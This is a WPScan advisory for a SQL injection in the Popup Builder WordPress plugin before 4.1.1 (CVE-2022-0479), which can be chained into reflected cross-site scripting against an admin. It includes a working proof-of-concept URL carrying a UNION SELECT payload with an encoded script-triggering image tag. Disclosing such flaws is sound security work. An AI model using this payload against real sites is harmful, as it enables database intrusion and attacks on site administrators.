WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Popup Builder < 4.1.1 - SQL Injection to Reflected Cross-Site Scripting

Description

The plugin does not sanitise and escape the sgpb-subscription-popup-id parameter before using it in a SQL statement in the All Subscribers admin dashboard, leading to a SQL injection, which could also be used to perform Reflected Cross-Site Scripting attack against a logged in admin opening a malicious link

Proof of Concept

https://example.com/wp-admin/edit.php?post_type=popupbuilder&page=sgpbSubscribers&sgpb-subscription-popup-id=0%29+union+all++select+1%2C0x3c696d6720737263206f6e6572726f723d616c6572742831293e%2C3%2C4%2C5%2C6+--+g

Affects Plugins

popup-builder
Fixed in version 4.1.1

References

CVE
CVE-2022-0479
URL
https://plugins.trac.wordpress.org/changeset/2686454

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website
https://kazet.cc/
Verified

Yes

WPVDB ID
0d2bbbaf-fbfd-4921-ba4e-684e2e77e816

Timeline

Publicly Published

2022-03-07 (about 6 months ago)

Added

2022-03-07 (about 6 months ago)

Last Updated

2022-04-08 (about 5 months ago)

Our Other Services

WPScan WordPress Security Plugin